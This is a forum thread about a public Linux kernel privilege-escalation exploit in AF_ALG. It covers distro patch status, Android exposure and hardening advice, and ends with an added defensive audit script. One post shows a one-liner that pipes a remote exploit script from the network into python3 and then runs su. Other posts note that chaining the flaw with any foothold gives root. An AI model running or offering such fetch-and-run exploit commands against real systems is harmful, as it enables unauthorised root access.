Public exploit on most Linux distro’s - patching recommended

Comments

  • BackboneDirect Member, Host Rep

    Rebootless method for patching via eBPF

    https://github.com/wgnet/wg.copyfail.patch

  • emperor Member
    edited May 1

    anyone knows if there is patched kernel update for debian 12 and ubuntu 24.04 ?

  • @emperor said:
    anyone knows if there is patched kernel update for debian 12 and ubuntu 24.04 ?

    There isn't a patch for Debian 11/12 yet; only Debian 13 is patched so far, and only if you have the security apt repos enabled (which I believe is the default): https://security-tracker.debian.org/tracker/source-package/linux

    Ubuntu 24.04 also appears to be patched, because after an update I'm now running kernel v6.8.0-111-generic and the patch should be applied as of v6.8.0-107.107.

    I can't guarantee any of that, though, but Wazuh has stopped whining at me about it, so I think my Debian 13 and Ubuntu 24.04 instances are patched now.

  • emperor Member

    @CloudHopper said: Ubuntu 24.04 also appears to be patched

    Thanks.

  • davide Member
    edited May 1

    So all passwords / auth tokens safely stored on Android phones are public knowledge now.

    :o

    Thanked by 2rpqu CloudHopper
  • Murv Member, Megathread Squad

    @davide said: Android phones

    Android's not really affected by this, AF_ALG is blocked by SELinux in Android

  • davide Member
    edited May 1

    @Murv said:

    @davide said: Android phones

    Android's not really affected by this, AF_ALG is blocked by SELinux in Android

    I've read so on Wikipedia, but the claim narrowly targets GrapheneOS; the SELinux configuration would be up to the phone manufacturer, so I suppose there could be vulnerable phones out there.

    It would be cool to run the proof of concept python script on Android but it seems like a mess:

    https://docs.python.org/3/using/android.html
    As a result, the only way you can use Python on Android is in embedded mode – that is, by writing a native Android application, embedding a Python interpreter using libpython, and invoking Python code using the Python embedding API.

  • @davide said:

    @Murv said:

    @davide said: Android phones

    Android's not really affected by this, AF_ALG is blocked by SELinux in Android

    I've read so on Wikipedia, but the claim narrowly targets GrapheneOS; the SELinux configuration would be up to the phone manufacturer, so I suppose there could be vulnerable phones out there.

    It would be cool to run the proof of concept python script on Android but it seems like a mess:

    https://docs.python.org/3/using/android.html
    As a result, the only way you can use Python on Android is in embedded mode – that is, by writing a native Android application, embedding a Python interpreter using libpython, and invoking Python code using the Python embedding API.

    I'm not an Android Dev so don't quote me on this, but it sounds to me like sketchy Android apps just got several orders of magnitude more dangerous. From being able to do whatever they can with the permissions you can trick a user into permitting, to requesting some benign permissions to get the install and then rooting the device.

    If that's true it's an enormous clusterfuck because most old and active Android devices will have already stopped getting software updates long before this dropped.

  • oloke Member, Host Rep

    @Murv said:

    @davide said: Android phones

    Android's not really affected by this, AF_ALG is blocked by SELinux in Android

    This is the most nerdy comment I read today.

    Thanks @Murv .

  • Murv Member, Megathread Squad
    edited May 1

    @davide said: the SELinux configuration would be up to the phone manufacturer so I suppose there could be vulnerable phones out there

    Technically yeah, but I doubt manufacturers touch the baseline AOSP SELinux rules much.

    @davide said: It would be cool to run the proof of concept python script on Android but it seems like a mess:

    You can actually run Python scripts on Android using Termux

    (Well the embedded setuid payload in PoC would fail cuz it's x64 but I bet the Python script would fail at the first socket(AF_ALG,...) stage regardless)

    Thanked by 2oloke stable_genius
  • jonathanspw Member, Host Rep

    https://almalinux.org/blog/2026-05-01-cve-2026-31431-copy-fail/

    Updates are about to roll out to the AlmaLinux production repositories. Identical to the ones currently in testing repos.

  • hyperblast Member
    Linux Debian12 6.1.0-45-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.170-1 (2026-04-30) x86_64
    
  • hyperblast Member
    edited May 1

    Debian 11 patched.

    Linux debian 5.10.0-41-cloud-amd64 #1 SMP Debian 5.10.251-3 (2026-04-30) x86_64
    
    Thanked by 1khalequzzaman
  • emperor Member
    edited May 1

    Too bad I have to break 1+ year uptime on IRC (Undernet) from KuroIt and AlphaVPS :(

  • Nekopara Member

    just restarted all my servers to apply the patch 👍

  • jonathanspw Member, Host Rep

    it's pretty useless unless one has a shell already

    I assume this can be used to gain root on other devices? Android? Routers? Other IoT stuff? This could be a win.

    Thanked by 1rpqu
  • hyperblast Member
    edited May 2

    Is this remotely exploitable?

    Not by itself — it requires local code execution as a regular user. Chain it with anything that gives you that (web RCE landing in an unprivileged service account, an SSH foothold, a malicious PR on a CI runner) and you're root.

    https://copy.fail/#faq

  • @nghialele said:
    Too scary I cancelled my vps.

    Installed Windows to be safe.

    Thanked by 1TimboJones
  • @zed said:
    I just watched the most amusing conversation play out on irc where a gentleman was explaining to the audience how he was safe from this exploit because he's been chmod 700 /usr/bin/su for the last 10 years.

    He's not wrong.

  • wii747 Member

    I tried to update my Ubuntu 24.04.4 LTS, but it keeps coming up with:

    N: Some packages may have been kept back due to phasing.

  • tentor Member, Host Rep

    @KnightHider said:

    @zed said:
    I just watched the most amusing conversation play out on irc where a gentleman was explaining to the audience how he was safe from this exploit because he's been chmod 700 /usr/bin/su for the last 10 years.

    He's not wrong.

    I think any other suid binary with root owner will work.

    Thanked by 1CloudHopper
  • @tentor said:

    @KnightHider said:

    @zed said:
    I just watched the most amusing conversation play out on irc where a gentleman was explaining to the audience how he was safe from this exploit because he's been chmod 700 /usr/bin/su for the last 10 years.

    He's not wrong.

    I think any other suid binary with root owner will work.

    Any user who's a member of the docker group is also a good substitute.

    Thanked by 1tentor
  • zed Member

    welp.

  • miniopt Member

    An interesting comment from the HackerNews thread:

    As someone who works on the Linux kernel's cryptography code, the regularly occurring AF_ALG exploits are really frustrating. AF_ALG, which was added to the kernel many years ago without sufficient review, should not exist. It's very complex, and it exposes a massive attack surface to unprivileged userspace programs. And it's almost completely unnecessary, as userspace already has its own cryptography code to use. The kernel's cryptography code is just for in-kernel users (for example, dm-crypt).

    The algorithm being used in this exploit, "authencesn", is even an IPsec implementation detail, which never should have been exposed to userspace as a general-purpose en/decryption API.

    If you're in charge of the configuration for a Linux kernel, I strongly recommend disabling all CONFIG_CRYPTO_USER_API_* kconfig options. This would have made this bug, and also every past and future AF_ALG bug, unexploitable. In the unlikely event that you find that it breaks any userspace programs on your system, please help migrate them to userspace crypto code! For some it's already been done. But in general, AF_ALG has actually never been used much in the first place, other than in exploits.

    I don't think there's much other option. This sort of userspace API might have been sort of okay many years ago. But it just doesn't stand up in a world with syzbot, LLM-assisted bug discovery, etc.

    https://news.ycombinator.com/item?id=47956312

  • Drv Member

    move to openbsd

  • emperor Member

    I guess Oracle also patched version 8; there is a new kernel available for upgrade.

    Thanked by 1oloke
  • amarc Veteran

    From what I gathered, if that kernel module is not loaded/available it's not exploitable? Because on my couple of servers (Deb12, Deb13, Ubuntu 24.04 systems) these are not loaded, and when I run curl https://copy.fail/exp | python3 && su nothing really happens and all I get is some:

    Traceback (most recent call last):
      File "<stdin>", line 9, in <module>
      File "<stdin>", line 5, in c
    FileNotFoundError: [Errno 2] No such file or directory
    
    Thanked by 1oloke
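    Added example, written for this page and not code from the thread, from copy.fail, or from any distro: a small POSIX sh audit that turns the HN advice quoted by @miniopt (disable every CONFIG_CRYPTO_USER_API_* option) and @amarc's "is it exploitable if the module isn't loaded?" question into something you can run on a host. It reads the running kernel's config (assumed to be at /proc/config.gz or /boot/config-$(uname -r)) and lsmod, and reports which AF_ALG options are built in (=y), modular (=m) or absent, plus which af_alg/algif_* modules are currently loaded. The sample config and lsmod text at the bottom are constructed for demonstration. The caveat it encodes: an empty lsmod list is not evidence of safety, because af_alg and the algif_* modules autoload on the first socket(AF_ALG, ...) call when they exist as modules, and a failing run of someone else's PoC (as in the traceback above) says nothing about whether the API is reachable; the kernel config is the thing to check.

```shell
#!/bin/sh
# Added audit helper: not code from this thread, from copy.fail, or from any
# distro. It answers two questions a defender asks after reading the thread:
#   1. Does the running kernel expose the AF_ALG userspace crypto API at all
#      (CONFIG_CRYPTO_USER_API* built in as =y or modular as =m)?
#   2. Which af_alg / algif_* modules are loaded right now?
# Sample inputs near the bottom are constructed, not captured from a real host.

# Read kernel config text on stdin; print every enabled CONFIG_CRYPTO_USER_API*
# line. Exit status 0 means none is enabled (API absent), 1 means some are.
afalg_config_status() {
    enabled=$(grep -E '^CONFIG_CRYPTO_USER_API[A-Z_]*=(y|m)$' || true)
    if [ -z "$enabled" ]; then
        return 0
    fi
    printf '%s\n' "$enabled"
    return 1
}

# Count CONFIG_CRYPTO_USER_API* options that are built in (=y). Those cannot
# be kept out with a modprobe blacklist; only a kernel rebuild removes them.
afalg_builtin_count() {
    grep -Ec '^CONFIG_CRYPTO_USER_API[A-Z_]*=y$' || true
}

# Read `lsmod` output on stdin; print the loaded AF_ALG-related module names.
afalg_loaded_modules() {
    awk '$1 == "af_alg" || $1 ~ /^algif_/ { print $1 }'
}

# Print the running kernel's config if the distro ships it (assumed locations).
running_kernel_config() {
    if [ -r /proc/config.gz ] && command -v zcat >/dev/null 2>&1; then
        zcat /proc/config.gz
    elif [ -r "/boot/config-$(uname -r)" ]; then
        cat "/boot/config-$(uname -r)"
    fi
}

# Human-readable audit of the host this script runs on.
audit_running_system() {
    cfg=$(running_kernel_config)
    if [ -z "$cfg" ]; then
        echo "kernel config not found; cannot assess CONFIG_CRYPTO_USER_API*"
    elif printf '%s\n' "$cfg" | afalg_config_status >/dev/null; then
        echo "AF_ALG userspace API is disabled in the kernel config"
    else
        builtin=$(printf '%s\n' "$cfg" | afalg_builtin_count)
        echo "AF_ALG userspace API is enabled ($builtin option(s) built in):"
        printf '%s\n' "$cfg" | afalg_config_status || true
    fi
    if command -v lsmod >/dev/null 2>&1; then
        loaded=$(lsmod 2>/dev/null | afalg_loaded_modules)
        # An empty list is not proof of safety: af_alg and algif_* autoload
        # on the first socket(AF_ALG, ...) call if they exist as modules.
        echo "currently loaded AF_ALG modules: ${loaded:-none}"
    fi
}

# Constructed sample inputs for a self-contained demonstration.
SAMPLE_CONFIG_EXPOSED='CONFIG_CRYPTO_USER_API=y
CONFIG_CRYPTO_USER_API_HASH=y
CONFIG_CRYPTO_USER_API_SKCIPHER=m
CONFIG_CRYPTO_USER_API_AEAD=m
CONFIG_CRYPTO_AES=y'
SAMPLE_CONFIG_HARDENED='# CONFIG_CRYPTO_USER_API is not set
# CONFIG_CRYPTO_USER_API_AEAD is not set
CONFIG_CRYPTO_AES=y'
SAMPLE_LSMOD='Module                  Size  Used by
algif_aead             16384  0
algif_skcipher         16384  0
af_alg                 28672  2 algif_aead,algif_skcipher
ext4                  987136  1'

echo "== sample exposed config =="
printf '%s\n' "$SAMPLE_CONFIG_EXPOSED" | afalg_config_status || echo "(exposed)"
echo "== sample hardened config =="
printf '%s\n' "$SAMPLE_CONFIG_HARDENED" | afalg_config_status && echo "(not exposed)"
echo "== sample lsmod =="
printf '%s\n' "$SAMPLE_LSMOD" | afalg_loaded_modules
echo "== this host =="
audit_running_system
```

    On a stock distro kernel the options are usually =m, which is why lsmod shows nothing until something opens an AF_ALG socket. For a modular build, a modprobe.d line such as `install af_alg /bin/false` stops the autoload (the same mechanism CIS-style hardening uses for unused network protocols); for a =y build only a rebuild with the options off, as the HN commenter recommends, removes the attack surface. Either way, apply the distro kernel update first; this script is an exposure inventory, not a substitute for the patch.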